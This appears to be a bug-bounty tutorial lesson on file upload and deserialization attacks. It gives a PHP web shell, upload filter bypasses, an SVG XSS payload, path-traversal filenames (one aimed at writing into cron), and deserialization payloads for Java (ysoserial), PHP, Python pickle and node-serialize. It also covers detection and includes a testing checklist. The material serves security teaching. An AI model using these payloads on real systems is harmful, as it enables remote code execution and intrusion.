File Upload & Deserialization Attacks

File uploads and deserialization are high-impact attack vectors that can lead to Remote Code Execution (RCE). These vulnerabilities consistently yield critical bounties.

File Upload Vulnerabilities

Basic Web Shell Upload

# PHP web shell
<?php system($_GET['cmd']); ?>

# Save as: shell.php
# Upload to profile picture
# Access: https://example.com/uploads/shell.php?cmd=id

Bypass Techniques

Extension Bypass

# Blacklist bypass
shell.php5
shell.phtml
shell.php.jpg
shell.php%00.jpg  # Null byte (old systems)
shell.pHp  # Case variation

# Double extension
shell.jpg.php
shell.php.jpg (with Apache misconfiguration)

# Content-Type manipulation
Change: image/jpeg → application/x-php (in request)

Magic Bytes Injection

# Add image magic bytes to PHP file
GIF89a<?php system($_GET['cmd']); ?>

# Or prepend to file
echo -e 'GIF89a' | cat - shell.php > polyglot.php.gif

SVG XSS

<!-- SVG files often allowed as "images" -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>alert('XSS')</script>
</svg>

<!-- Or with onload -->
<svg onload="alert('XSS')">

Exploitation Scenarios

Upload Location	Impact
Web root	Direct RCE via web shell
User profile	Stored XSS via SVG/HTML
Document storage	PDF/Office exploits, XXE
Backup directory	Path traversal + overwrite

Path Traversal in Upload

# Filename manipulation
filename="../../../var/www/html/shell.php"
filename="....//....//....//var/www/html/shell.php"

# Overwrite sensitive files
filename="../../../etc/cron.d/malicious"

Deserialization Attacks

When applications deserialize untrusted data, attackers can execute arbitrary code.

Java Deserialization

# Detection: Base64-encoded data starting with rO0
# Or: AC ED 00 05 (hex magic bytes)

# Tools
ysoserial: Generate payloads
java -jar ysoserial.jar CommonsCollections1 'id' | base64

# Common gadget chains
CommonsCollections1-7
Spring1-4
Hibernate1-2

PHP Deserialization

// Vulnerable code
$data = unserialize($_GET['data']);

// Attack: Craft object with __destruct or __wakeup
O:8:"ClassName":1:{s:4:"data";s:10:"id"}

Python Pickle

# Vulnerable
import pickle
data = pickle.loads(user_input)

# Attack payload
import pickle
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))

payload = pickle.dumps(Exploit())

Node.js node-serialize

# Vulnerable: node-serialize package
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('id')}()"}

# Detection: Look for "_$$ND_FUNC$$_" in serialized data

Detection Techniques

Finding Serialized Data

# Look in:
# - Cookies
# - Hidden form fields
# - API request/response bodies
# - WebSocket messages

# Java indicators
rO0...  (Base64)
AC ED 00 05 (raw hex)

# PHP indicators
O:4:"User":1:{...}
a:2:{i:0;s:4:"test"...}

# .NET indicators
AAEAAAD/////... (Base64)

Automated Detection

# Using Burp extensions
# - Java Deserialization Scanner
# - PHP Object Injection Check

# Nuclei templates
nuclei -l targets.txt -tags deserialization

Bounty Examples

Company	Bug Type	Bounty
PayPal	Java deser RCE	$20,000
Uber	File upload RCE	$10,000
Yahoo	PHP object injection	$7,500
Airbnb	SVG XSS via upload	$3,500

Testing Checklist

File Upload:

Test all extension variations
Test content-type manipulation
Test magic bytes injection
Test path traversal in filename
Check where file is stored (accessible?)
Try SVG/HTML for XSS

Deserialization:

Identify serialized data in app
Determine serialization format
Test with ysoserial (Java)
Test PHP object injection
Check for known vulnerable libraries

Pro Tip: File upload + deserialization often combine. Upload a serialized payload, trigger its deserialization via another feature.

Next, we'll explore Server-Side Template Injection (SSTI). :::

Quiz